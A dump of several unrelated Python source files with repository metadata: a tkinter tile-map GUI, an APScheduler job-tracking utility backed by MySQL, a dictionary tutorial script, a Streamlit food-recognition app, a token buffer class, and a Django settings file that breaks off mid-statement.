xpos = xpos-self.xoffset
ypos = ypos-self.yoffset
if '.' in image: #isinstance(image,tkinter.PhotoImage):
image = self.get_image(image)
self.canvas.create_image(int(xpos*self.tilesize),int(ypos*self.tilesize),
image=image, anchor=tkinter.NW,
tag=tag)
else: # Color code given
self.canvas.create_rectangle(xpos*self.tilesize,ypos*self.tilesize,
((xpos+1)*self.tilesize-1),((ypos+1)*self.tilesize-1),
fill=image,outline=image,tag=tag)
def get_image(self,image_name):
try:
image = self.image_repository[image_name]
except KeyError:
image_filename,x,y=split_filename(image_name)
try:
image = self.image_repository[image_filename]
except KeyError:
image = tkinter.PhotoImage(file=image_filename)
self.image_repository[image_filename] = image
if x or y:
image = subimage(image,x*self.tilesize,y*self.tilesize,(x+1)*self.tilesize,(y+1)*self.tilesize)
self.image_repository[image_name] = image
return image
def center_map(self,xpos,ypos):
xoffset = xpos-(self.xsize/2)
yoffset = ypos-(self.ysize/2)
self.canvas.move('background',self.tilesize*(self.xoffset-xoffset),self.tilesize*(self.yoffset-yoffset))
self.canvas.move('foreground',self.tilesize*(self.xoffset-xoffset),self.tilesize*(self.yoffset-yoffset))
self.xoffset =xoffset
self.yoffset =yoffset
def clear_map_foreground(self):
self.canvas.delete('foreground')
def new_map(self,image_array):
self.canvas.delete('foreground')
self.canvas.delete('background')
self.xoffset = 0
self.yoffset = 0
for y in range(len(image_array)):
for x in range(len(image_array[y])):
if image_array[y][x]:
self.add_to_map(image_array[y][x],x,y,'background')
def _has_input(self,event):
if(self.input_lock.locked()):
self.text_entered = self.input.get() #.encode('latin-1')
if self.text_entered:
self.input.delete('0',tkinter.END)
self.input_lock.release()
def get_input(self):
self.input_lock.acquire()
return self.text_entered
def prn(self,*strings):
self.mutex.acquire()
l = len(strings)
string = ''
tags = tuple()
for i in range(l):
if strings[i] in self.tag_list:
tags += (strings[i],)
else:
string += string_when_needed(strings[i])
if i+1 == l:
string += '\n'
else:
string += ' '
self.update_queue += [('text',string,tags)]
self.updates_ready_flag = True
self.mutex.release()
def pr(self,*strings):
self.mutex.acquire()
l = len(strings)
string = ''
tags = tuple()
for i in range(l):
if strings[i] in self.tag_list:
tags += (strings[i],)
else:
string += string_when_needed(strings[i])+' '
self.update_queue += [('text',string,tags)]
self.updates_ready_flag = True
self.mutex.release()
def prim(self,image):
self.mutex.acquire()
self.update_queue += [('textimage',image)]
self.updates_ready_flag = True
self.mutex.release()
def guiquit(self):
print('Bye!')
self.quit()
def ask_for_load_file(self):
self.mutex.acquire()
self.update_queue += [('loadfile',)]
self.updates_ready_flag = True
self.mutex.release()
self.input_lock.acquire()
return self.text_entered
def ask_for_save_file(self):
self.mutex.acquire()
self.update_queue += [('savefile',)]
self.updates_ready_flag = True
self.mutex.release()
self.input_lock.acquire()
return self.text_entered
def string_when_needed(obj):
if isinstance(obj,str): #unicode
return obj
else:
return str(obj)
# Takes a file name "<name>'['<int1>']''['<int2>']'
# and return <name>,<int1>,<int2>
def split_filename(fn):
if not '[' in fn:
return fn, 0, 0
else:
return fn[:fn.find('[')], int(fn[fn.find('[')+1:fn.find(',')]), int(fn[fn.find(',')+1:-1])
# To get a recangular subimage of an existing image
def subimage(src, l, t, r, b):
dst = tkinter.PhotoImage()
dst.tk.call(dst, 'copy', src, '-from', l, t, r, b, '-to', 0, 0)
return dst
| [
"lars.karlsson@oru.se"
] | lars.karlsson@oru.se |
5eeaa7ec503906bf393cfbde66233d04a3698f41 | 6d11f214381fa4ca8c27e779ae988dd47cce322b | /com_donot_use/port8/core_old/schedutility.py | 00df3949f1c94f2edc6d71c18842d3d3ed7ab41a | [] | no_license | myuconnect/Port8 | d4e0d8fd53adb625e3a80f8a44e44095e2f03262 | eb28211b18c0178820ee14e32606ed223761671f | refs/heads/master | 2020-03-19T02:42:21.700013 | 2018-09-12T01:45:24 | 2018-09-12T01:45:24 | 135,512,706 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,586 | py | from apscheduler.schedulers.background import BackgroundScheduler
from apscheduler.schedulers.blocking import BlockingScheduler
from com.port8.core.singleton import Singleton
from com.port8.core.globals import Global
from com.port8.core.utils import Utility
from com.port8.core.error import *
from com.port8.core.infrautils import InfraUtility
from com.port8.db.dbmysql import DBMySql
import os, sys, time, random, datetime, json
class SchedUtility(object, metaclass=Singleton):
def __init__(self):
try:
self.Global = Global()
self.Utility = Utility()
self.InfraUtil = InfraUtility()
self.db = DBMySql('Scheduler')
self.myModulePyFile = os.path.abspath(__file__)
self.myClass = self.__class__.__name__
#Setting the infrastructure
self.Infra = self.InfraUtil.setInfra(self.Global.SchedulerInfraKey)
if not self.Infra:
raise InfraInitializationError('Could not initialize {cls}'.format(cls=(self.myModulePyFile,self.myClass)))
# we need to get the proper logger for a given module
self.logger = self.Infra.getInfraLogger(self.Global.SchedulerInfraKey)
# loading Schduler config and starting scheduler
self.__startScheduler__()
except Exception as err:
raise err
def __startScheduler__(self):
try:
mySchedulerType = self.Global.DefaultSchedulerType
mySchedulerMode = self.Global.DefaultSchedulerMode
if mySchedulerMode == 'Run':
myArgPaused = False
else:
myArgPaused = True
#fi
mySchedulerConfig = self.Utility.getACopy(self.Infra.schedulerConfigData)
if mySchedulerType == 'Background':
self.Scheduler = BackgroundScheduler(mySchedulerConfig)
else:
self.Scheduler = BlockingScheduler(mySchedulerConfig)
#fi
if not self.Scheduler.running:
self.Scheduler.start(paused = myArgPaused)
except Exception as err:
raise err
def getAllJobDetail(self):
'''
Description: Returns all jobs as stored in scheduler
'''
myJobDetail = []
for job in self.Scheduler.get_jobs():
myJobDetail.append(self.getAJobDetail(job.id))
return myJobDetail
def getAJobDetail(self, jobIdArg):
'''
Description: Print all jobs as stored in scheduler
'''
myJobId = jobIdArg
job = self.Scheduler.get_job(myJobId)
myJobDetail = job.__getstate__()
return myJobDetail
def suspendJob(self, jobIdArg):
myJobId = jobIdArg
job = self.Scheduler.get_job(myJobId)
job.pause()
def resumeJob(self, jobIdArg):
myJobId = jobIdArg
job = self.Scheduler.get_job(myJobId)
job.resume()
def getCurrentlyExecutingJob(self):
return len(self.Scheduler.get_jobs())
def removeJob(self, jobId):
try:
self.Scheduler.remove_job(jobId)
except JobLookupError as err:
print('Invalid Job !!')
def removeAllJobs(self):
try:
self.Scheduler.remove_all_jobs()
except Exception as err:
raise err
def getAllJobsFromRep(self):
for job in self.Scheduler.get_jobs():
myJobDetail = self.Scheduler.get_job(job.id)
print(job,myJobDetail)
def getNewJob(self,prefixArg):
# random number between 10 and 99 to ensure we always get 2 digit
if isinstance(prefixArg,str) and prefixArg is not None:
return prefixArg + '_' + str(datetime.datetime.fromtimestamp(time.time()).strftime('%Y%m%d_%-H%M%S_') + str(random.randrange(10,99)))
else:
return datetime.datetime.fromtimestamp(time.time()).strftime('%Y%m%d_%-H%M%S_') + str(random.randrange(10,99))
def getJobInfoFromDb(self, jobIdArg):
try:
myResponse = self.Utility.getResponseTemplate()
myJobId = self.Utility.getACopy(jobIdArg)
self.logger.debug('arg [{arg}] received'.format(arg = myJobId))
myJobCriteria = 'JobId = %s ' %repr(myJobId)
return self.db.processDbRequest(operation = self.Global.fetch, container = 'ScheduledJobs', contents = ['*'], criteria = myJobCriteria)
except Exception as err:
myErrorMsg, myTraceback = self.Utility.getErrorTraceback()
self.logger.error(self.Global.DefPrefix4Error * self.Global.DefPrefixCount , myErrorMsg)
self.logger.error(self.Global.DefPrefix4Error * self.Global.DefPrefixCount , myTraceback)
self.Utility.buildResponse(myResponse, self.Global.UnSuccess,myErrorMsg)
return myResponse
def getNextSeqForJob(self, jobIdArg):
try:
myResponse = self.Utility.getResponseTemplate()
myJobId = self.Utility.getACopy(jobIdArg)
self.logger.debug('arg [{arg}] received'.format(arg = myJobId))
myJobCriteria = 'JobId = %s ' %repr(myJobId)
return self.db.getTotalRowCount(container = 'ScheduledJobsRunLog', criteria = myJobCriteria) + 1
except Exception as err:
myErrorMsg, myTraceback = self.Utility.getErrorTraceback()
self.logger.error(self.Global.DefPrefix4Error * self.Global.DefPrefixCount , myErrorMsg)
self.logger.error(self.Global.DefPrefix4Error * self.Global.DefPrefixCount , myTraceback)
return myErrorMsg
def getCurrentSeqForJob(self, jobIdArg):
try:
myResponse = self.Utility.getResponseTemplate()
myJobId = self.Utility.getACopy(jobIdArg)
self.logger.debug('arg [{arg}] received'.format(arg = myJobId))
myJobCriteria = 'JobId = %s ' %repr(myJobId)
return self.db.getTotalRowCount(container = 'ScheduledJobsRunLog', criteria = myJobCriteria)
except Exception as err:
myErrorMsg, myTraceback = self.Utility.getErrorTraceback()
self.logger.error(self.Global.DefPrefix4Error * self.Global.DefPrefixCount , myErrorMsg)
self.logger.error(self.Global.DefPrefix4Error * self.Global.DefPrefixCount , myTraceback)
return myErrorMsg
def getElapsedStatsForJob(self, jobIdArg):
try:
myResponse = self.Utility.getResponseTemplate()
myJobId = self.Utility.getACopy(jobIdArg)
self.logger.debug('arg [{arg}] received'.format(arg = myJobId))
myJobCriteria = 'JobId = %s ' %repr(myJobId)
return self.db.getTotalRowCount(container = 'ScheduledJobsRunLog', criteria = myJobCriteria)
except Exception as err:
myErrorMsg, myTraceback = self.Utility.getErrorTraceback()
self.logger.error(self.Global.DefPrefix4Error * self.Global.DefPrefixCount , myErrorMsg)
self.logger.error(self.Global.DefPrefix4Error * self.Global.DefPrefixCount , myTraceback)
return myErrorMsg
def processJobStartEvent(self, jobIdArg):
'''
1. Mark job started in ScheduledJobs
2. Create new entry for this job in ScheduledJobsRunLog
'''
try:
# initializing
myResponse = self.Utility.getResponseTemplate()
myJobId = self.Utility.getACopy(jobIdArg)
self.logger.debug('arg [{arg}] received'.format(arg=myJobId))
myJobDetailsFromDb = self.getJobInfoFromDb(myJobId)['Data']
if myJobDetailsFromDb:
# building data for SchedulerJobsRunLog
myJobCriteria = ' JobId = %s' %repr(myJobId)
myNextSeqForJob = self.getNextSeqForJob(myJobId)
# will mark the job started and creat the run log for this run
self.db.processDbRequest(operation='change', container='ScheduledJobs', \
dataDict={'Status': 'Executing'}, criteria = myJobCriteria, commitWork=True )
# creating run information
self.db.processDbRequest(operation='create', container='ScheduledJobsRunLog', \
dataDict={'JobId':myJobId, 'Seq' : myNextSeqForJob, 'ExecutionStarted': self.Utility.getCurrentTime()}, commitWork=True )
self.Utility.buildResponse(myResponse, self.Global.Success, self.Global.Success, {'Seq':myNextSeqForJob})
else:
self.Utility.buildResponse(myResponse, self.Global.UnSuccess, 'Cound not find job details for job {job}'.format(job = myJobId))
return myResponse
except Exception as err:
myErrorMsg, myTraceback = self.Utility.getErrorTraceback()
self.logger.error(self.Global.DefPrefix4Error * self.Global.DefPrefixCount , myErrorMsg)
self.logger.error(self.Global.DefPrefix4Error * self.Global.DefPrefixCount , myTraceback)
self.Utility.buildResponse(myResponse, self.Global.UnSuccess,myErrorMsg)
#raise err # will raise the error so this can be logged by scheduler as an error occurred in processing job
return myResponse
def processJobFinishEvent(self, jobIdArg, execDetailsArg):
'''
1. Mark job completed (update failure cnt and total count and consc fail count, lastrunstatus) in ScheduledJobs
2. Update ScheduledJobsRunlog container
'''
try:
# initializing
myResponse = self.Utility.getResponseTemplate()
myJobId = self.Utility.getACopy(jobIdArg)
myExecDetails = execDetailsArg
myJobStatus = self.Global.NextJobRun
self.logger.debug('arg [{arg}] received'.format(arg=myJobId))
myJobDetailsFromDb = self.getJobInfoFromDb(myJobId)['Data']
if myJobDetailsFromDb:
self.logger.debug('Job details found, proceeding with finish event')
myJobCriteria = 'JobId = %s' %repr(myJobId)
myCurrentSeqForJob = self.getCurrentSeqForJob(myJobId)
myJobRunCriteria = ' JobId = %s and Seq = %s ' %(repr(myJobId), myCurrentSeqForJob)
self.logger.debug('Job criteria {criteria}'.format(criteria = myJobCriteria))
self.logger.debug('Job criteria with seq {criteria}'.format(criteria = myJobRunCriteria))
myJobDetailsFromSched = self.getAJobDetail(myJobId)
# Updating execution details in ScheduledJobsRunLog
self.logger.debug('udating statistics of this run')
myDbResult = self.db.processDbRequest(operation = 'change', container = 'ScheduledJobsRunLog', \
dataDict={
'Status': myExecDetails['Status'], 'ElapsedSeconds':myExecDetails['Data']['ElapsedSecs'],
'ExecutionCompleted': self.Utility.getCurrentTime(), 'ExecutionDetail': json.dumps(myExecDetails['Data'])
}, criteria = myJobRunCriteria, commitWork=True )
self.logger.debug('ScheduledJobsRunLog: db results >> {results}'.format(results = myDbResult))
# Updating execution details in ScheduledJobs
#if myExecDetails['Status'] == self.Global.Success:
# if success, reset consecfailcnt to 0, increment totalrun by 1 and update next run
myElapsedStats = self.db.executeDynamicSql(\
operation = 'fetch', \
sql_text = 'select min(ElapsedSeconds) "Min", max(ElapsedSeconds) "Max", avg(ElapsedSeconds) "Avg" from ScheduledJobsRunLog')
self.logger.debug('Elapsed Stats: {stats}'.format(stats = myElapsedStats))
myDbResult = self.db.processDbRequest(operation='change', container='ScheduledJobs', \
dataDict={
'Status': myJobStatus, 'LastRunStatus': myExecDetails['Status'], 'TotalRun' : myJobDetailsFromDb[0]['TotalRun'] + 1,
'NextRun' : myJobDetailsFromSched['next_run_time'].strftime('%Y-%m-%d% %H:%M:%S'), 'LatConsecFailCnt' : 0,
'MinElapsedSecs' : myElapsedStats['Data'][0]['Min'], 'MaxElapsedSecs' : myElapsedStats['Data'][0]['Min'] ,
'AvgElapsedSecs' : myElapsedStats['Data'][0]['Avg']
}, criteria = myJobCriteria, commitWork=True )
self.logger.debug('ScheduledJobs: last stats update >> {result}'.format(result = myDbResult))
#self.Utility.buildResponse(myResponse, self.Global.Success,self.Global.Success)
'''
else:
# process job was unsuccessful
if myJobDetailsFromDb[0]['LatConsecFailCnt'] >= self.Global.SchedConsecFailCntThreshold:
myJobStatus = self.Global.SuspendMode
self.logger.info('suspending job {job}'.format(job=myJobId))
self.suspendJob(myJobId)
myDbResult = self.db.processDbRequest(operation='change', container='ScheduledJobs', \
dataDict={
'Status': myJobStatus, 'LastRunStatus': myExecDetails['Status'], 'TotalRun' : myJobDetailsFromDb[0]['TotalRun'] + 1,
'next_run' : myJobDetailsFromSched['next_run_time'], 'LatConsecFailCnt' : myJobDetailsFromDb[0]['LatConsecFailCnt'] + 1,
'TotalFailure' : myJobDetailsFromDb[0]['TotalFailure' + 1]
}, criteria = myJobCriteria, commitWork=True )
# will suspend the job if total failure count has been reached beyond Total consecutive failure threshold
self.Utility.buildResponse(myResponse, self.Global.UnSuccess,self.Global.UnSuccess)
raise processJobError(myExecDetails['Message'])
'''
self.Utility.buildResponse(myResponse, self.Global.Success,self.Global.Success)
return myResponse
except Exception as err:
myErrorMsg, myTraceback = self.Utility.getErrorTraceback()
self.logger.error(self.Global.DefPrefix4Error * self.Global.DefPrefixCount , myErrorMsg)
self.logger.error(self.Global.DefPrefix4Error * self.Global.DefPrefixCount , myTraceback)
self.Utility.buildResponse(myResponse, self.Global.UnSuccess, myErrorMsg)
return myResponse | [
"oracledba.usa88@gmail.com"
] | oracledba.usa88@gmail.com |
817b4cde609c42a165cc9ddc8e3ece7e7f5b8001 | 3ca80a9a55652e21a7c69008842e86ac72f744d3 | /real_python_courses/Python_Dict.py | 53c563d563f4eb3a36a257c673e0ac123587d57a | [] | no_license | pshapard/New_projects | 29ef9f7793e137124d33ca461e3dd686023789c5 | 8cf0e244cde07dd0f750de6a064deba970c0cf7a | refs/heads/master | 2022-02-11T06:13:35.278903 | 2022-01-25T19:21:14 | 2022-01-25T19:21:14 | 253,964,490 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,504 | py | #
class PrintThis(object):
def __init__(self):
"""funtion to initialize a class"""
pass
def HashTag120(self):
"""Function to print out 120 hashtags"""
print('#'*120)
printme = PrintThis()
printme.HashTag120()
my_dict = {'color': 'red', 'fruit': 'apple', 'species':'dog'}
my_dict['color']
print("Iterate over a dictionary and get the KEY:VALUE pair")
for key, value in my_dict.items():
print(key, '-->', value)
#This is a built-in python function
#print(vars())
#print(locals())
#print(dir(my_dict))
#If you want to access just the value in a dict do this
print("If you want to access just the VALUE in a dict do this")
for value in my_dict.values():
print(value)
print("If you want to access just the KEY in a dict do this")
for key in my_dict.keys():
print(key)
print(my_dict.values())
print(my_dict.keys())
print("This will print out the item in each item".upper())
for item in my_dict.items():
print(item[1])
print("This will print out the key in each item".capitalize())
for item in my_dict.items():
print(item[0])
prices = {'brcm':'25.34', 'hpe':'14.75', 'msft':'155'}
for key, value in prices.items():
print(key, '-->', value)
prices['brcm'] = 33.52
print('The price of brcm went up')
for key, value in prices.items():
print(key, '-->', value)
prices['Intel'] = 75.47
print('Added Intel stock to the dictionary')
for key, value in prices.items():
print(key, '-->', value)
printme.HashTag120()
incomes = {'Patrick': 120000, 'Beatriz': 75000, 'Joseph': 45000}
total_incomes = 0
for key, income in incomes.items():
total_incomes += income
print("The total income of the family {:,}" .format(total_incomes, '.2d'))
print(f'The total income of the family {total_incomes:,}')
print('Dictionary comprehension'.upper)
colors = ['Red','Blue','Orange']
objects = ['Car','Blouse','Tophat']
print(colors)
print(objects)
print('Example of taking two lists, using the zip(), and creating a dictionary using dict comprehension\n')
new_dict = {key: value for key, value in zip(colors, objects)}
print(new_dict)
print('Using the new_dict, we\'ll a dict comprehension to swap key:value pair')
new_dict2 = {value: key for key, value in new_dict.items()}
print(f'This is the new dictionary: {new_dict2}')
next_dict = {key: value for key, value in new_dict.items() if key == 'Red'}
print(next_dict)
printme.HashTag120()
dict1 = vars()
for key, value in list(dict1.items()):
print(key, '-->' ,value)
| [
"pshapard@outlook.com"
] | pshapard@outlook.com |
c70b7c8d785d5cea2c74ae6cb5e0d76bfb3512c5 | e2b4da672e778ecda0c11677f40da2b20f2bb6a9 | /app.py | 209211213fe131134faa02aa76097db4178df4b7 | [] | no_license | luongtruong77/food_130_recognition | cc183316d09eed4152e1cf951ba28c4334677cb9 | c6a683a953b90d113290630c5825df8fba223cf7 | refs/heads/main | 2023-07-17T22:48:59.299873 | 2021-08-26T00:09:04 | 2021-08-26T00:09:04 | 397,708,731 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,613 | py | import tensorflow as tf
import streamlit as st
def load_and_prep_image(filename, img_shape=380, scale=True):
"""
Reads in an image from filename, turns it into a tensor and reshapes into
(380, 380, 3).
Parameters
----------
filename (str): string filename of target image
img_shape (int): size to resize target image to, default 380
scale (bool): whether to scale pixel values to range(0, 1), default True
"""
# Read in the image
img = tf.io.read_file(filename)
# Decode it into a tensor
img = tf.image.decode_jpeg(img)
# Resize the image
img = tf.image.resize(img, [img_shape, img_shape])
if scale:
# Rescale the image (get all values between 0 and 1)
return img / 255.
else:
return img
class_names = ['apple_pie',
'baby_back_ribs',
'baklava',
'bánh_bèo',
'bánh_bột_lọc',
'bánh_căn',
'bánh_canh',
'bánh_chưng',
'bánh_cuốn',
'bánh_đúc',
'bánh_giò',
'bánh_khọt',
'bánh_mì',
'bánh_pía',
'bánh_tét',
'bánh_tráng_nướng',
'bánh_xèo',
'beef_carpaccio',
'beef_tartare',
'beet_salad',
'beignets',
'bibimbap',
'bread_pudding',
'breakfast_burrito',
'bruschetta',
'bún_bò_huế',
'bún_đậu_mắm_tôm',
'bún_mắm',
'bún_riêu',
'bún_thịt_nướng',
'cá_kho_tộ',
'caesar_salad',
'canh_chua',
'cannoli',
'cao_lầu',
'caprese_salad',
'carrot_cake',
'ceviche',
'cháo_lòng',
'cheese_plate',
'cheesecake',
'chicken_curry',
'chicken_quesadilla',
'chicken_wings',
'chocolate_cake',
'chocolate_mousse',
'churros',
'clam_chowder',
'club_sandwich',
'cơm_tấm',
'crab_cakes',
'creme_brulee',
'croque_madame',
'cup_cakes',
'deviled_eggs',
'donuts',
'dumplings',
'edamame',
'eggs_benedict',
'escargots',
'falafel',
'filet_mignon',
'fish_and_chips',
'foie_gras',
'french_fries',
'french_onion_soup',
'french_toast',
'fried_calamari',
'fried_rice',
'frozen_yogurt',
'garlic_bread',
'gnocchi',
'gỏi_cuốn',
'greek_salad',
'grilled_cheese_sandwich',
'grilled_salmon',
'guacamole',
'gyoza',
'hamburger',
'hot_and_sour_soup',
'hot_dog',
'hủ_tiếu',
'huevos_rancheros',
'hummus',
'ice_cream',
'lasagna',
'lobster_bisque',
'lobster_roll_sandwich',
'macaroni_and_cheese',
'macarons',
'mì_quảng',
'miso_soup',
'mussels',
'nachos',
'nem_chua',
'omelette',
'onion_rings',
'oysters',
'pad_thai',
'paella',
'pancakes',
'panna_cotta',
'peking_duck',
'phở',
'pizza',
'pork_chop',
'poutine',
'prime_rib',
'pulled_pork_sandwich',
'ramen',
'ravioli',
'red_velvet_cake',
'risotto',
'samosa',
'sashimi',
'scallops',
'seaweed_salad',
'shrimp_and_grits',
'spaghetti_bolognese',
'spaghetti_carbonara',
'spring_rolls',
'steak',
'strawberry_shortcake',
'sushi',
'tacos',
'takoyaki',
'tiramisu',
'tuna_tartare',
'waffles',
'xôi_xéo']
st.markdown("<h1 style='text-align: center; color: black;'>Food Recognition App!</h1>",
unsafe_allow_html=True)
st.write('---')
st.write('This app is capable of recognizing 130 kinds of food with over 30 kinds of Vietnamese foods '
'(including **phở, gỏi cuốn, bánh bèo, bánh mì, hủ tiếu, bánh xèo**, etc). ')
st.write('This app is created by [Steven Truong](https://www.linkedin.com/in/luongtruong77/).')
st.write('The source codes can be found [here](https://github.com/luongtruong77/food_130_recognition)')
st.write('---')
# @st.cache(hash_funcs={tf.keras.utils.object_identity.ObjectIdentityDictionary: my_hash_func})
def model_loading(link):
model = tf.keras.models.load_model(link)
return model
loaded_model = model_loading(link="models/model.h5")
uploaded_file = st.file_uploader("Choose a file or use the device's camera:")
if uploaded_file is not None:
bytes_data = uploaded_file.read()
st.image(bytes_data, use_column_width=True)
with open('./image.jpg', 'wb') as f:
f.write(bytes_data)
# Make predictions on custom food images
img = load_and_prep_image("image.jpg", scale=False) # load in target image and turn it into tensor
pred_prob = loaded_model.predict(
tf.expand_dims(img, axis=0)) # make prediction on image with shape [None, 224, 224, 3]
pred_class = " ".join(class_names[pred_prob.argmax()].split("_")) # find the predicted class label
second_pred_prob = sorted(pred_prob[0])[-2]
second_pred_index = list(pred_prob[0]).index(sorted(pred_prob[0])[-2])
second_pred_class_name = " ".join(class_names[second_pred_index].split("_"))
if pred_prob.max() <= 0.95:
st.write(
f"**Prediction:** {pred_prob.max() * 100:.2f}% {pred_class}, {second_pred_prob * 100:.2f}% {second_pred_class_name} ")
else:
st.write(
f"**Prediction:** {pred_prob.max() * 100:.2f}% {pred_class}.")
| [
"tqluong77@gmail.com"
] | tqluong77@gmail.com |
3d60ed7e99f218433773775f5e56aec334e9fb8d | 52b2e3470cd4b91975b2e1caed8d1c93c20e5d05 | /tools/parsertools/testbuffer.py | f8f8dd1bfbe81182baf42dae60fe879de314da4a | [] | no_license | xprime480/projects | c2f9a82bbe91e00859568dc27ae17c3b5dd873e3 | 3c5eb2d53bd7fa198edbe27d842ee5b5ff56e226 | refs/heads/master | 2020-04-27T03:51:29.456979 | 2019-04-12T14:34:39 | 2019-04-12T14:34:39 | 174,037,060 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 466 | py |
class TestBuffer(object) :
def __init__(self, tokens) :
self.tokens = tokens[:]
self.size = len(self.tokens)
self.index = 0
def get(self) :
rv = self.peek()
if rv :
self.index += 1
return rv
def peek(self) :
if self.index >= self.size :
rv = None
else :
rv = self.tokens[self.index]
#print 'TestBuffer returning %s' % rv
return rv
| [
"mi.davis@sap.com"
] | mi.davis@sap.com |
278269ce0336906a35c4a57f21cb02693fa64334 | 28b098b11832f1f0d06afe498cf76a64a9a90750 | /backend/thejacobblog_24666/settings.py | 53c464969db683b34de86ff561e4bcb4b06f15ed | [] | no_license | crowdbotics-apps/thejacobblog-24666 | 4fa5ca6c37a47bfcfd325a2a421a6ca0f53ad9f6 | d53ba1565a19577f391422d90f41e8ab6a7f9eb0 | refs/heads/master | 2023-03-18T22:33:56.488920 | 2021-02-22T23:34:51 | 2021-02-22T23:34:51 | 341,368,094 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,041 | py | """
Django settings for thejacobblog_24666 project.
Generated by 'django-admin startproject' using Django 2.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import environ
import logging
env = environ.Env()
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = env.bool("DEBUG", default=False)
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env.str("SECRET_KEY")
ALLOWED_HOSTS = env.list("HOST", default=["*"])
SITE_ID = 1
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
SECURE_SSL_REDIRECT = env.bool("SECURE_REDIRECT", default=False)
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites'
]
LOCAL_APPS = [
'home',
'modules',
'users.apps.UsersConfig',
]
THIRD_PARTY_APPS = [
'rest_framework',
'rest_framework.authtoken',
'rest_auth',
'rest_auth.registration',
'bootstrap4',
'allauth',
'allauth.account',
'allauth.socialaccount',
'allauth.socialaccount.providers.google',
'django_extensions',
'drf_yasg',
'storages',
# start fcm_django push notifications
'fcm_django',
# end fcm_django push notifications
]
INSTALLED_APPS += LOCAL_APPS + THIRD_PARTY_APPS
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'thejacobblog_24666.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'thejacobblog_24666.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
if env.str("DATABASE_URL", default=None):
DATABASES = {
'default': env.db()
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
MIDDLEWARE += ['whitenoise.middleware.WhiteNoiseMiddleware']
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend'
)
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles")
STATICFILES_DIRS = [os.path.join(BASE_DIR, 'static')]
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
# allauth / users
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_AUTHENTICATION_METHOD = 'email'
ACCOUNT_USERNAME_REQUIRED = False
ACCOUNT_EMAIL_VERIFICATION = "optional"
ACCOUNT_CONFIRM_EMAIL_ON_GET = True
ACCOUNT_LOGIN_ON_EMAIL_CONFIRMATION = True
ACCOUNT_UNIQUE_EMAIL = True
LOGIN_REDIRECT_URL = "users:redirect"
ACCOUNT_ADAPTER = "users.adapters.AccountAdapter"
SOCIALACCOUNT_ADAPTER = "users.adapters.SocialAccountAdapter"
ACCOUNT_ALLOW_REGISTRATION = env.bool("ACCOUNT_ALLOW_REGISTRATION", True)
SOCIALACCOUNT_ALLOW_REGISTRATION = env.bool("SOCIALACCOUNT_ALLOW_REGISTRATION", True)
REST_AUTH_SERIALIZERS = {
# Replace password reset serializer to fix 500 error
"PASSWORD_RESET_SERIALIZER": "home.api.v1.serializers.PasswordSerializer",
}
REST_AUTH_REGISTER_SERIALIZERS = {
# Use custom serializer that has no username and matches web signup
"REGISTER_SERIALIZER": "home.api.v1.serializers.SignupSerializer",
}
# Custom user model
AUTH_USER_MODEL = "users.User"
EMAIL_HOST = env.str("EMAIL_HOST", "smtp.sendgrid.net")
EMAIL_HOST_USER = env.str("SENDGRID_USERNAME", "")
EMAIL_HOST_PASSWORD = env.str("SENDGRID_PASSWORD", "")
EMAIL_PORT = 587
EMAIL_USE_TLS = True
# AWS S3 config
AWS_ACCESS_KEY_ID = env.str("AWS_ACCESS_KEY_ID", "")
AWS_SECRET_ACCESS_KEY = env.str("AWS_SECRET_ACCESS_KEY", "")
AWS_STORAGE_BUCKET_NAME = env.str("AWS_STORAGE_BUCKET_NAME", "")
AWS_STORAGE_REGION = env.str("AWS_STORAGE_REGION", "")
USE_S3 = (
